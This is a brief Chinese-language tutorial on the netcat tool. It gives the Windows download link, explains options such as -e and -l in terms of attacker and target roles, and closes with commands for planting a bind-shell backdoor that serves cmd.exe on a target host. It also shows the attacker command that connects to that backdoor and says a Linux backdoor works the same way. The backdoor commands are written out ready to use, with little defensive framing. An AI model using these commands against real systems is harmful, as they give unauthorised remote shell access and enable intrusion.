netcat
在网络工具中有“瑞士军刀”美誉。
下载地址:https://eternallybored.org/misc/netcat/(windows版本)
下载解压后将文件夹路径添加到系统变量path中或切换到该工具所在文件夹运行。
使用命令nc -h可查看命令帮助文档:
命令参数使用说明:
- 攻击者 连接目标: nc [-选项] [主机名] [端口](多个端口空格隔开)
- 被攻击端 监听端口: nc -l -p 端口号(本地) [选项] [远程主机名] [远程端口号]反向连接攻击者主机
- -h:查看帮助文档
- -e: 程序重定向 一旦攻击者连接就执行程序
- -l:监听模式,用于入站连接
- -p :本地端口号
- -t:以TELNET的形式应答入站请求
- -v/-vv:输出详细信息
开启目标主机的后门:
nc -l -t -v -p 8888 -e cmd.exe
攻击者正向连接目标主机后门:
nc -t 192.168.57.129 8888
同理可设置Linux后门。